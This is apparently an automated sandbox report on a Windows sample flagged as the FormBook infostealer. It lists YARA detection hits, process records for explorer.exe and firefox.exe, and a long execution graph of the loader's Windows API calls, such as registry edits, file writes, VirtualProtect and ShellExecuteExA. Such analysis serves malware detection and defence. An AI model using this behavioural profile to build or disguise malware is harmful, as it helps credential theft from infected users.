                                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.5562454936.0000000004980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.5562454936.0000000004980000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.5559916396.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.5559916396.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                          Start time:10:18:31
                                                                                                                                                                                          Start date:10/08/2023
                                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                          Imagebase:0x7ff607fa0000
                                                                                                                                                                                          File size:4'849'904 bytes
                                                                                                                                                                                          MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                          Start time:10:18:52
                                                                                                                                                                                          Start date:10/08/2023
                                                                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                          Imagebase:0x7ff6996f0000
                                                                                                                                                                                          File size:597'432 bytes
                                                                                                                                                                                          MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:23.1%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:25.7%
                                                                                                                                                                                            Total number of Nodes:1546
                                                                                                                                                                                            Total number of Limit Nodes:31
                                                                                                                                                                                            execution_graph 4258 4025c5 4259 4025f5 4258->4259 4260 4025ce 4258->4260 4262 402e92 21 API calls 4259->4262 4261 402ed0 21 API calls 4260->4261 4263 4025d5 4261->4263 4268 4025fc 4262->4268 4264 4025db 4263->4264 4267 402608 4263->4267 4265 402e92 21 API calls 4264->4265 4266 4025e2 RegDeleteValueA RegCloseKey 4265->4266 4266->4267 4268->4267 4270 40141e 4268->4270 4271 40614a RegOpenKeyExA 4270->4271 4272 40145b 4271->4272 4273 401463 4272->4273 4274 401527 4272->4274 4275 401493 4273->4275 4276 40146f RegEnumValueA 4273->4276 4274->4267 4277 401503 RegCloseKey 4275->4277 4278 4014ce RegEnumKeyA 4275->4278 4279 4014d8 RegCloseKey 4275->4279 4282 40141e 6 API calls 4275->4282 4276->4275 4276->4277 4277->4274 4278->4275 4278->4279 4280 4066e5 5 API calls 4279->4280 4281 4014e9 4280->4281 4283 401514 4281->4283 4284 4014ed RegDeleteKeyA 4281->4284 4282->4275 4283->4274 4284->4274 4882 6ee82d6f 4883 6ee82d87 4882->4883 4884 6ee812d5 2 API calls 4883->4884 4885 6ee82da2 4884->4885 4886 402bc8 4887 402e56 21 API calls 4886->4887 4888 402bce 4887->4888 4889 405d47 21 API calls 4888->4889 4890 4016ed 4888->4890 4889->4890 4891 401bc9 4892 402e56 21 API calls 4891->4892 4893 401bd3 4892->4893 4894 402e56 21 API calls 4893->4894 4895 401b7c 4894->4895 4896 401e4c 4897 402e56 21 API calls 4896->4897 4898 401e52 IsWindow 4897->4898 4899 401b7c 4898->4899 4773 40264f 4774 402e92 21 API calls 4773->4774 4775 402666 4774->4775 4776 402e92 21 API calls 4775->4776 4777 402671 4776->4777 4792 406117 4777->4792 4780 402cfc 4781 4026c1 4784 4026c8 4781->4784 4788 4026d7 4781->4788 4782 4026af 4783 402e92 21 API calls 4782->4783 4785 4026b6 lstrlenA 4783->4785 4786 402e56 21 API calls 4784->4786 4787 4026f0 RegSetValueExA 4785->4787 4789 4026cf 4786->4789 4791 40270b RegCloseKey 4787->4791 4788->4787 4790 4030d6 48 API calls 4788->4790 4789->4787 4790->4789 4791->4780 4793 406126 4792->4793 4794 40268f 4793->4794 4795 40612f RegCreateKeyExA 4793->4795 4794->4780 4794->4781 4794->4782 4795->4794 4900 40214f 4901 402e92 21 API calls 4900->4901 4902 402156 4901->4902 4903 4066e5 5 API calls 4902->4903 4904 402167 4903->4904 4905 402183 GlobalAlloc 4904->4905 4906 4021fe 4904->4906 4905->4906 4907 402198 4905->4907 4908 4066e5 5 API calls 4907->4908 4909 40219f 4908->4909 4910 4066e5 5 API calls 4909->4910 4911 4021a8 4910->4911 4911->4906 4915 406408 wsprintfA 4911->4915 4913 4021ec 4916 406408 wsprintfA 4913->4916 4915->4913 4916->4906 4917 401ad1 4918 402e56 21 API calls 4917->4918 4919 401ad8 4918->4919 4920 402e56 21 API calls 4919->4920 4921 401ae3 4920->4921 4922 402e92 21 API calls 4921->4922 4923 401af0 lstrlenA 4922->4923 4924 401b0c 4923->4924 4925 401b38 4923->4925 4924->4925 4929 40690a lstrcpynA 4924->4929 4927 401b2c 4927->4925 4928 401b30 lstrlenA 4927->4928 4928->4925 4929->4927 4930 4020d1 4931 402e92 21 API calls 4930->4931 4932 4020d7 4931->4932 4933 405ba4 28 API calls 4932->4933 4934 4020e1 4933->4934 4935 4064ba 2 API calls 4934->4935 4936 4020e7 4935->4936 4937 40210c 4936->4937 4940 4016ed 4936->4940 4943 406304 WaitForSingleObject 4936->4943 4938 4020c6 CloseHandle 4937->4938 4937->4940 4938->4940 4941 4020fd 4941->4937 4948 406408 wsprintfA 4941->4948 4944 40631b 4943->4944 4945 406331 GetExitCodeProcess 4944->4945 4946 4060b7 2 API calls 4944->4946 4945->4941 4947 406322 WaitForSingleObject 4946->4947 4947->4944 4948->4937 4949 401b52 4950 402e92 21 API calls 4949->4950 4951 401b59 4950->4951 4952 402e92 21 API calls 4951->4952 4953 401b62 4952->4953 4954 401b72 lstrcmpA 4953->4954 4955 401b6a lstrcmpiA 4953->4955 4956 401b78 4954->4956 4955->4956 4957 403553 4958 403562 SetTimer 4957->4958 4959 403576 4957->4959 4958->4959 4960 4035c5 4959->4960 4963 4031da MulDiv 4959->4963 4962 403584 wsprintfA SetWindowTextA SetDlgItemTextA 4962->4960 4963->4962 4964 405755 4965 40576a 4964->4965 4966 40577e 4964->4966 4967 405770 4965->4967 4968 4057c3 CallWindowProcA 4965->4968 4969 40579d 4966->4969 4970 405786 IsWindowVisible 4966->4970 4972 4053d7 SendMessageA 4967->4972 4971 40577a 4968->4971 4969->4968 4981 4053a5 4969->4981 4970->4968 4973 405793 4970->4973 4972->4971 4976 40555f SendMessageA 4973->4976 4977 405580 GetMessagePos ScreenToClient SendMessageA 4976->4977 4978 4055be SendMessageA 4976->4978 4979 4055b6 4977->4979 4980 4055bb 4977->4980 4978->4979 4979->4969 4980->4978 4990 40690a lstrcpynA 4981->4990 4983 4053b8 4991 406408 wsprintfA 4983->4991 4985 4053c2 4986 401533 100 API calls 4985->4986 4987 4053cb 4986->4987 4992 40690a lstrcpynA 4987->4992 4989 4053d2 4989->4968 4990->4983 4991->4985 4992->4989 4993 402cd7 SendMessageA 4994 402cef InvalidateRect 4993->4994 4995 402cfc 4993->4995 4994->4995 4868 402958 4869 402961 4868->4869 4872 402986 4868->4872 4870 402e56 21 API calls 4869->4870 4871 402968 4870->4871 4873 402975 SetFilePointer 4871->4873 4873->4872 4996 4029da 4997 402e92 21 API calls 4996->4997 4998 4029e1 FindFirstFileA 4997->4998 5000 4029cc 4998->5000 5000->4996 5001 406408 wsprintfA 5000->5001 5001->5000 5002 404ddd 5003 404e13 5002->5003 5004 404ded 5002->5004 5006 4055e0 8 API calls 5003->5006 5005 405409 22 API calls 5004->5005 5007 404dfa SetDlgItemTextA 5005->5007 5008 404e1f 5006->5008 5007->5003 5009 401e6b 5010 402e56 21 API calls 5009->5010 5011 401e72 5010->5011 5012 402e56 21 API calls 5011->5012 5013 401e7b GetDlgItem 5012->5013 4611 4067ee ShellExecuteExA 5014 6ee810c6 5020 6ee810f7 5014->5020 5015 6ee812a7 GlobalFree 5016 6ee81245 GlobalFree 5016->5020 5017 6ee811d5 GlobalAlloc 5017->5020 5018 6ee812a3 5018->5015 5019 6ee814e2 3 API calls 5019->5020 5020->5015 5020->5016 5020->5017 5020->5018 5020->5019 5021 6ee81286 GlobalFree 5020->5021 5022 6ee8157e 2 API calls 5020->5022 5023 6ee815c7 lstrcpyA 5020->5023 5025 6ee8115d GlobalAlloc 5020->5025 5021->5020 5024 6ee811ca GlobalFree 5022->5024 5026 6ee811ad GlobalFree 5023->5026 5024->5020 5025->5020 5026->5020 4796 6ee819c7 4797 6ee81a1e 4796->4797 4798 6ee819d7 VirtualProtect 4796->4798 4798->4797 5027 401a6f 5028 401a70 5027->5028 5029 402e92 21 API calls 5028->5029 5030 401a75 5029->5030 5031 4064fd 70 API calls 5030->5031 5032 401a7f 5031->5032 5033 401d73 5034 402e56 21 API calls 5033->5034 5035 401d7a 5034->5035 5036 402e56 21 API calls 5035->5036 5037 401d87 5036->5037 5038 401d9a 5037->5038 5039 402e92 21 API calls 5037->5039 5040 401daf 5038->5040 5041 402e92 21 API calls 5038->5041 5039->5038 5042 401e09 5040->5042 5043 401dba 5040->5043 5041->5040 5044 402e92 21 API calls 5042->5044 5045 402e56 21 API calls 5043->5045 5046 401e0e 5044->5046 5047 401dbf 5045->5047 5048 402e92 21 API calls 5046->5048 5049 402e56 21 API calls 5047->5049 5050 401e17 FindWindowExA 5048->5050 5051 401dca 5049->5051 5054 401e32 5050->5054 5052 401dd7 SendMessageTimeoutA 5051->5052 5053 401dfa SendMessageA 5051->5053 5052->5054 5053->5054 4849 401f76 GetDC 4850 402e56 21 API calls 4849->4850 4851 401f86 GetDeviceCaps MulDiv ReleaseDC 4850->4851 4852 402e56 21 API calls 4851->4852 4853 401fb6 4852->4853 4854 405d47 21 API calls 4853->4854 4855 401ff0 CreateFontIndirectA 4854->4855 5055 403c7a 5056 403c85 5055->5056 5057 403c89 5056->5057 5058 403c8c GlobalAlloc 5056->5058 5058->5057 4874 40257c 4875 402e92 21 API calls 4874->4875 4876 40258b 4875->4876 4877 402e92 21 API calls 4876->4877 4878 402594 4877->4878 4879 402e92 21 API calls 4878->4879 4880 40259d GetPrivateProfileStringA 4879->4880 4881 4025bb 4880->4881 3807 402000 3815 402e56 3807->3815 3809 402006 3810 402e56 21 API calls 3809->3810 3811 40200f 3810->3811 3812 402024 EnableWindow 3811->3812 3813 402019 ShowWindow 3811->3813 3814 402cfc 3812->3814 3813->3814 3818 405d47 3815->3818 3817 402e6a 3817->3809 3833 405d52 3818->3833 3819 405fac 3820 405fc0 3819->3820 3848 40690a lstrcpynA 3819->3848 3820->3817 3822 405f7b lstrlenA 3822->3833 3823 405d47 15 API calls 3823->3822 3826 405e76 GetSystemDirectoryA 3826->3833 3828 405e8c GetWindowsDirectoryA 3828->3833 3829 405d47 15 API calls 3829->3833 3830 405f1c lstrcatA 3830->3833 3831 406aed CharNextA CharNextA CharNextA CharNextA CharPrevA 3831->3833 3833->3819 3833->3822 3833->3823 3833->3826 3833->3828 3833->3829 3833->3830 3833->3831 3834 405eee SHGetPathFromIDListA CoTaskMemFree 3833->3834 3835 406776 3833->3835 3840 4066e5 GetModuleHandleA 3833->3840 3846 406408 wsprintfA 3833->3846 3847 40690a lstrcpynA 3833->3847 3834->3833 3849 40614a 3835->3849 3838 4067da 3838->3833 3839 4067ab RegQueryValueExA RegCloseKey 3839->3838 3841 406707 GetProcAddress 3840->3841 3842 4066fd 3840->3842 3844 406715 3841->3844 3853 40604a GetSystemDirectoryA 3842->3853 3844->3833 3845 406703 3845->3841 3845->3844 3846->3833 3847->3833 3848->3820 3850 406159 3849->3850 3851 406162 RegOpenKeyExA 3850->3851 3852 40615d 3850->3852 3851->3852 3852->3838 3852->3839 3855 40606c wsprintfA LoadLibraryExA 3853->3855 3855->3845 5059 401000 5060 401039 BeginPaint GetClientRect 5059->5060 5061 40100a DefWindowProcA 5059->5061 5063 40110f 5060->5063 5064 40119a 5061->5064 5065 401117 5063->5065 5066 40107e CreateBrushIndirect FillRect DeleteObject 5063->5066 5067 401185 EndPaint 5065->5067 5068 40111d CreateFontIndirectA 5065->5068 5066->5063 5067->5064 5068->5067 5069 401130 6 API calls 5068->5069 5069->5067 5070 402300 5071 402e92 21 API calls 5070->5071 5072 402307 5071->5072 5073 402e92 21 API calls 5072->5073 5074 402312 5073->5074 5075 402e92 21 API calls 5074->5075 5076 40231b 5075->5076 5077 402e92 21 API calls 5076->5077 5078 402326 5077->5078 5079 402e92 21 API calls 5078->5079 5081 402331 5079->5081 5080 402371 CoCreateInstance 5085 402397 5080->5085 5086 402450 5080->5086 5081->5080 5082 402e92 21 API calls 5081->5082 5082->5080 5083 405ba4 28 API calls 5084 40248c 5083->5084 5085->5086 5087 402430 MultiByteToWideChar 5085->5087 5086->5083 5087->5086 3889 404e83 3890 404ea2 3889->3890 3891 405024 3889->3891 3890->3891 3892 404eae 3890->3892 3893 405038 GetDlgItem GetDlgItem 3891->3893 3894 405071 3891->3894 3895 404eb3 SetWindowPos 3892->3895 3896 404ecd 3892->3896 3897 405409 22 API calls 3893->3897 3898 4050c8 3894->3898 3908 401399 100 API calls 3894->3908 3899 405010 3895->3899 3900 404f20 3896->3900 3901 404ed2 ShowWindow 3896->3901 3903 40505b SetClassLongA 3897->3903 3915 40501f 3898->3915 3960 4053d7 3898->3960 3982 4055e0 3899->3982 3905 404f42 3900->3905 3906 404f28 DestroyWindow 3900->3906 3901->3899 3904 404ef7 GetWindowLongA 3901->3904 3907 401533 100 API calls 3903->3907 3904->3899 3911 404f13 ShowWindow 3904->3911 3912 404f47 SetWindowLongA 3905->3912 3913 404f5a 3905->3913 3917 405357 3906->3917 3907->3894 3909 4050a1 3908->3909 3909->3898 3914 4050a5 SendMessageA 3909->3914 3911->3899 3912->3915 3913->3899 3919 404f66 GetDlgItem 3913->3919 3914->3915 3916 401533 100 API calls 3933 4050da 3916->3933 3917->3915 3920 40538a ShowWindow 3917->3920 3918 405359 DestroyWindow EndDialog 3918->3917 3921 404f82 SendMessageA IsWindowEnabled 3919->3921 3922 404fa5 3919->3922 3920->3915 3921->3915 3924 404fa1 3921->3924 3925 404fb4 3922->3925 3926 404ff7 SendMessageA 3922->3926 3927 404fc6 3922->3927 3936 404fac 3922->3936 3923 405d47 21 API calls 3923->3933 3924->3922 3925->3926 3925->3936 3926->3899 3931 404fdd 3927->3931 3932 404fcf 3927->3932 3928 405409 22 API calls 3928->3933 3930 404ff5 3930->3899 3935 401533 100 API calls 3931->3935 3976 401533 3932->3976 3933->3915 3933->3916 3933->3918 3933->3923 3933->3928 3951 405299 DestroyWindow 3933->3951 3963 405409 3933->3963 3937 404fe4 3935->3937 3979 4057dd 3936->3979 3937->3899 3937->3936 3939 40515e GetDlgItem 3940 405185 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 3939->3940 3944 405179 3939->3944 3940->3944 3941 4051da GetSystemMenu EnableMenuItem SendMessageA 3942 405207 SendMessageA 3941->3942 3941->3944 3942->3944 3944->3940 3944->3941 3966 4053f2 SendMessageA 3944->3966 3967 405b85 3944->3967 3970 40690a lstrcpynA 3944->3970 3947 405239 lstrlenA 3948 405d47 21 API calls 3947->3948 3949 405251 SetWindowTextA 3948->3949 3971 401399 3949->3971 3951->3917 3952 4052b3 CreateDialogParamA 3951->3952 3952->3917 3953 4052e6 3952->3953 3954 405409 22 API calls 3953->3954 3955 4052f1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3954->3955 3956 401399 100 API calls 3955->3956 3957 405337 3956->3957 3957->3915 3958 40533f ShowWindow 3957->3958 3959 4053d7 SendMessageA 3958->3959 3959->3917 3961 4053e0 SendMessageA 3960->3961 3962 4053ef 3960->3962 3961->3962 3962->3933 3964 405d47 21 API calls 3963->3964 3965 405414 SetDlgItemTextA 3964->3965 3965->3939 3966->3944 3968 405d47 21 API calls 3967->3968 3969 405b93 SetWindowTextA 3968->3969 3969->3944 3970->3947 3972 4013a3 3971->3972 3974 401413 3971->3974 3972->3974 3975 4013df MulDiv SendMessageA 3972->3975 3996 40154a 3972->3996 3974->3933 3975->3972 3977 401399 100 API calls 3976->3977 3978 401547 3977->3978 3978->3936 3980 4057e4 3979->3980 3981 4057ea SendMessageA 3979->3981 3980->3981 3981->3930 3983 4055f8 GetWindowLongA 3982->3983 3984 4056ae 3982->3984 3983->3984 3985 40560d 3983->3985 3984->3915 3985->3984 3986 405641 3985->3986 3987 405635 GetSysColor 3985->3987 3988 405645 SetTextColor 3986->3988 3989 40564f SetBkMode 3986->3989 3987->3986 3988->3989 3990 405677 3989->3990 3991 405668 GetSysColor 3989->3991 3992 405688 3990->3992 3993 40567b SetBkColor 3990->3993 3991->3990 3992->3984 3994 4056a1 CreateBrushIndirect 3992->3994 3995 405698 DeleteObject 3992->3995 3993->3992 3994->3984 3995->3994 3997 4015ac 3996->3997 4106 4015b3 3996->4106 3998 4018a3 3997->3998 3999 4016a6 3997->3999 4000 4015cb 3997->4000 4001 40180c 3997->4001 4002 4017b0 3997->4002 4003 4016d3 3997->4003 4004 401694 3997->4004 4005 4016f5 3997->4005 4006 401875 3997->4006 4007 4018b6 3997->4007 4008 401618 SetForegroundWindow 3997->4008 4009 4015ba 3997->4009 4010 4015fd 3997->4010 4011 40179f 3997->4011 4032 4015de 3997->4032 4038 401624 3997->4038 4053 4015f1 3997->4053 3997->4106 4022 402e92 21 API calls 3998->4022 4014 4016b5 ShowWindow 3999->4014 4015 4016bd 3999->4015 4017 4015d5 PostQuitMessage 4000->4017 4000->4106 4012 402e92 21 API calls 4001->4012 4021 402e92 21 API calls 4002->4021 4016 402e92 21 API calls 4003->4016 4150 406408 wsprintfA 4004->4150 4019 402e92 21 API calls 4005->4019 4020 402e92 21 API calls 4006->4020 4023 402e92 21 API calls 4007->4023 4008->4106 4027 405ba4 28 API calls 4009->4027 4009->4106 4024 402e56 21 API calls 4010->4024 4018 402e92 21 API calls 4011->4018 4025 401812 GetFullPathNameA 4012->4025 4014->4015 4026 4016ca ShowWindow 4015->4026 4015->4106 4028 4016da SetFileAttributesA 4016->4028 4017->4106 4029 4017a5 4018->4029 4030 4016fc 4019->4030 4031 40187c SearchPathA 4020->4031 4033 4017b7 4021->4033 4034 4018aa 4022->4034 4036 4018bd 4023->4036 4037 401603 Sleep 4024->4037 4039 401836 4025->4039 4040 40182b 4025->4040 4026->4106 4027->4106 4028->4106 4154 4063bd FindFirstFileA 4029->4154 4107 4069b5 CharNextA CharNextA 4030->4107 4031->4106 4043 401399 83 API calls 4032->4043 4044 402e92 21 API calls 4033->4044 4131 406851 4034->4131 4035 405ba4 28 API calls 4035->4106 4051 4018e2 4036->4051 4052 4018da 4036->4052 4037->4106 4046 402e56 21 API calls 4038->4046 4038->4106 4039->4040 4055 4063bd 2 API calls 4039->4055 4048 401867 GetShortPathNameA 4040->4048 4040->4106 4043->4106 4047 4017c0 4044->4047 4046->4106 4050 402e92 21 API calls 4047->4050 4048->4106 4049 401762 4049->4053 4054 40176d 4049->4054 4057 4017c9 MoveFileA 4050->4057 4163 40690a lstrcpynA 4051->4163 4162 40690a lstrcpynA 4052->4162 4053->4035 4119 405ba4 4054->4119 4062 401848 4055->4062 4056 4063e4 CharNextA 4076 401704 4056->4076 4057->4053 4063 4017e1 4057->4063 4060 4018ed 4164 406346 lstrlenA CharPrevA 4060->4164 4062->4040 4161 40690a lstrcpynA 4062->4161 4071 4063bd 2 API calls 4063->4071 4063->4106 4064 4018e0 4068 406aed 5 API calls 4064->4068 4101 4018ff 4068->4101 4075 4017f1 4071->4075 4073 40177f SetCurrentDirectoryA 4073->4106 4075->4106 4157 4060e5 MoveFileExA 4075->4157 4076->4049 4076->4056 4077 401748 GetFileAttributesA 4076->4077 4113 4062ec 4076->4113 4116 405cec CreateDirectoryA 4076->4116 4151 405ccc CreateDirectoryA 4076->4151 4077->4076 4079 4063bd 2 API calls 4079->4101 4080 401938 4167 40698d GetFileAttributesA 4080->4167 4084 401913 CompareFileTime 4084->4101 4085 4019e6 4086 405ba4 28 API calls 4085->4086 4089 4019f2 4086->4089 4087 4019cd 4088 405ba4 28 API calls 4087->4088 4088->4106 4136 4030d6 4089->4136 4092 40690a lstrcpynA 4092->4101 4093 401a20 SetFileTime 4094 401a2e CloseHandle 4093->4094 4096 401a41 4094->4096 4094->4106 4095 405d47 21 API calls 4095->4101 4097 401a46 4096->4097 4098 401a57 4096->4098 4099 405d47 21 API calls 4097->4099 4100 405d47 21 API calls 4098->4100 4102 401a4e lstrcatA 4099->4102 4103 401a5f 4100->4103 4101->4009 4101->4079 4101->4080 4101->4084 4101->4085 4101->4087 4101->4092 4101->4095 4135 40671a GetFileAttributesA CreateFileA 4101->4135 4170 406898 4101->4170 4102->4103 4105 406898 MessageBoxIndirectA 4103->4105 4105->4106 4106->3972 4108 4069d0 4107->4108 4112 406a00 4107->4112 4109 4069db CharNextA 4108->4109 4111 4069e0 4108->4111 4109->4112 4110 4063e4 CharNextA 4110->4111 4111->4110 4111->4112 4112->4076 4114 4066e5 5 API calls 4113->4114 4115 4062f3 4114->4115 4115->4076 4117 405d40 4116->4117 4118 405d38 GetLastError 4116->4118 4117->4076 4118->4117 4121 405bb6 4119->4121 4126 401774 4119->4126 4120 405bd7 lstrlenA 4123 405be8 lstrlenA 4120->4123 4124 405c09 4120->4124 4121->4120 4122 405d47 21 API calls 4121->4122 4122->4120 4125 405bfb lstrcatA 4123->4125 4123->4126 4127 405c16 SetWindowTextA 4124->4127 4128 405c27 4124->4128 4125->4124 4130 40690a lstrcpynA 4126->4130 4127->4128 4128->4126 4129 405c2b SendMessageA SendMessageA SendMessageA 4128->4129 4129->4126 4130->4073 4132 40685c GetTickCount GetTempFileNameA 4131->4132 4133 40688c 4132->4133 4134 406888 4132->4134 4133->4106 4134->4132 4134->4133 4135->4101 4137 4030e4 SetFilePointer 4136->4137 4138 4030ff 4136->4138 4137->4138 4174 402f57 GetTickCount 4138->4174 4143 401a08 4143->4093 4143->4094 4144 402f57 46 API calls 4145 403138 4144->4145 4145->4143 4146 4031a0 ReadFile 4145->4146 4148 403147 4145->4148 4146->4143 4147 406747 ReadFile 4147->4148 4148->4143 4148->4147 4189 406806 WriteFile 4148->4189 4150->4106 4152 405ce6 4151->4152 4153 405cde GetLastError 4151->4153 4152->4076 4153->4152 4155 4063d3 FindClose 4154->4155 4156 4063de 4154->4156 4155->4156 4156->4106 4158 406106 4157->4158 4159 4060f9 4157->4159 4158->4053 4225 406178 4159->4225 4161->4040 4162->4064 4163->4060 4165 406361 lstrcatA 4164->4165 4166 4018f3 lstrcatA 4164->4166 4165->4166 4166->4064 4168 4069af 4167->4168 4169 40699f SetFileAttributesA 4167->4169 4168->4101 4169->4168 4171 4068ad 4170->4171 4172 4068fb 4171->4172 4173 4068c3 MessageBoxIndirectA 4171->4173 4172->4101 4173->4172 4175 4030c2 4174->4175 4176 402f82 4174->4176 4177 4031f8 36 API calls 4175->4177 4191 402f40 SetFilePointer 4176->4191 4184 4030a9 4177->4184 4179 402f8d SetFilePointer 4183 402fb4 4179->4183 4183->4184 4185 406806 WriteFile 4183->4185 4186 4030b3 SetFilePointer 4183->4186 4192 406c36 4183->4192 4200 402f2a 4183->4200 4203 4031f8 4183->4203 4184->4143 4187 406747 ReadFile 4184->4187 4185->4183 4186->4175 4188 403121 4187->4188 4188->4143 4188->4144 4190 406827 4189->4190 4190->4148 4191->4179 4193 406c61 4192->4193 4196 406c59 4192->4196 4194 406d82 GlobalAlloc 4193->4194 4195 406d78 GlobalFree 4193->4195 4193->4196 4197 406d9c 4193->4197 4194->4196 4194->4197 4195->4194 4196->4183 4197->4196 4198 406e08 GlobalFree 4197->4198 4199 406e0f GlobalAlloc 4197->4199 4198->4199 4199->4196 4201 406747 ReadFile 4200->4201 4202 402f3d 4201->4202 4202->4183 4204 403204 4203->4204 4205 40321d 4203->4205 4206 403214 4204->4206 4207 40320d DestroyWindow 4204->4207 4208 403226 4205->4208 4209 40322f GetTickCount 4205->4209 4206->4183 4207->4206 4220 4060b7 4208->4220 4211 403299 4209->4211 4212 40323d 4209->4212 4211->4183 4214 403274 CreateDialogParamA ShowWindow 4212->4214 4215 403246 4212->4215 4214->4211 4215->4211 4224 4031da MulDiv 4215->4224 4217 403254 wsprintfA 4218 405ba4 28 API calls 4217->4218 4219 403272 4218->4219 4219->4183 4221 4060c9 PeekMessageA 4220->4221 4222 40322d 4221->4222 4223 4060bf DispatchMessageA 4221->4223 4222->4183 4223->4221 4224->4217 4226 4061c4 GetShortPathNameA 4225->4226 4227 40619e 4225->4227 4228 4062a4 4226->4228 4229 4061d9 4226->4229 4252 40671a GetFileAttributesA CreateFileA 4227->4252 4228->4158 4229->4228 4231 4061e1 wsprintfA 4229->4231 4233 405d47 21 API calls 4231->4233 4232 4061a8 CloseHandle GetShortPathNameA 4232->4228 4234 4061bc 4232->4234 4235 40620a 4233->4235 4234->4226 4234->4228 4253 40671a GetFileAttributesA CreateFileA 4235->4253 4237 406217 4237->4228 4238 406222 GetFileSize GlobalAlloc 4237->4238 4239 406241 4238->4239 4240 40629d CloseHandle 4238->4240 4241 406747 ReadFile 4239->4241 4240->4228 4242 406249 4241->4242 4242->4240 4254 406926 lstrlenA lstrlenA 4242->4254 4245 4062a9 4247 406926 3 API calls 4245->4247 4246 40625c lstrcpyA 4249 40626e 4246->4249 4247->4249 4248 40627f SetFilePointer 4250 406806 WriteFile 4248->4250 4249->4248 4251 406296 GlobalFree 4250->4251 4251->4240 4252->4232 4253->4237 4255 406945 4254->4255 4256 406258 4254->4256 4255->4256 4257 406972 lstrlenA 4255->4257 4256->4245 4256->4246 4257->4255 4257->4256 5093 6ee81c2b 5094 6ee81c52 5093->5094 5095 6ee81cad 5094->5095 5096 6ee81c8f GlobalFree 5094->5096 5097 6ee8157e 2 API calls 5095->5097 5096->5095 5098 6ee81d41 GlobalFree GlobalFree 5097->5098 5099 401a84 5100 402e92 21 API calls 5099->5100 5101 401a8b 5100->5101 5102 406898 MessageBoxIndirectA 5101->5102 5103 4016ed 5102->5103 5104 402a05 5105 402e92 21 API calls 5104->5105 5106 402a14 5105->5106 5107 402a2b 5106->5107 5108 402e92 21 API calls 5106->5108 5109 40698d 2 API calls 5107->5109 5108->5107 5110 402a31 5109->5110 5132 40671a GetFileAttributesA CreateFileA 5110->5132 5112 402a3e 5113 402b17 5112->5113 5116 402aff 5112->5116 5117 402a5f GlobalAlloc 5112->5117 5114 402b20 DeleteFileA 5113->5114 5115 402b32 5113->5115 5114->5115 5119 4030d6 48 API calls 5116->5119 5117->5116 5118 402a7f 5117->5118 5133 402f40 SetFilePointer 5118->5133 5120 402b0c CloseHandle 5119->5120 5120->5113 5122 402a85 5123 402f2a ReadFile 5122->5123 5124 402a8f GlobalAlloc 5123->5124 5125 402ae4 5124->5125 5126 402aa5 5124->5126 5128 406806 WriteFile 5125->5128 5127 4030d6 48 API calls 5126->5127 5131 402ab4 5127->5131 5129 402af3 GlobalFree 5128->5129 5129->5116 5130 402ada GlobalFree 5130->5125 5131->5130 5132->5112 5133->5122 5134 401b85 5135 402e92 21 API calls 5134->5135 5136 401b8e ExpandEnvironmentStringsA 5135->5136 5137 401ba1 5136->5137 5139 401bb3 5136->5139 5138 401ba7 lstrcmpA 5137->5138 5137->5139 5138->5139 5140 401e8a 5141 402e56 21 API calls 5140->5141 5142 401e98 SetWindowLongA 5141->5142 5143 402cfc 5142->5143 4285 40220b 4286 40221e 4285->4286 4295 4022e8 4285->4295 4287 402e92 21 API calls 4286->4287 4288 402225 4287->4288 4289 402e92 21 API calls 4288->4289 4290 402231 4289->4290 4291 40223d GetModuleHandleA 4290->4291 4292 40224e LoadLibraryExA 4290->4292 4293 402262 GetProcAddress 4291->4293 4294 40224a 4291->4294 4292->4293 4292->4295 4296 4022b5 4293->4296 4297 40226f 4293->4297 4294->4292 4298 405ba4 28 API calls 4296->4298 4299 405ba4 28 API calls 4297->4299 4300 402287 4297->4300 4298->4300 4299->4300 4300->4295 4301 4022dc FreeLibrary 4300->4301 4301->4295 4302 40288b 4303 402e56 21 API calls 4302->4303 4308 402896 4303->4308 4304 40290b SetFilePointer 4305 402953 4307 406747 ReadFile 4307->4308 4308->4304 4308->4305 4308->4307 4309 402947 4308->4309 4311 406408 wsprintfA 4309->4311 4311->4305 5144 6ee81a24 5150 6ee81504 5144->5150 5146 6ee81a7e GlobalFree 5147 6ee81a3c 5147->5146 5148 6ee81a5a 5147->5148 5149 6ee81a6a VirtualFree 5147->5149 5148->5146 5149->5146 5152 6ee8150a 5150->5152 5151 6ee81510 5151->5147 5152->5151 5153 6ee8151c GlobalFree 5152->5153 5153->5147 5154 6ee82b24 5155 6ee82b76 5154->5155 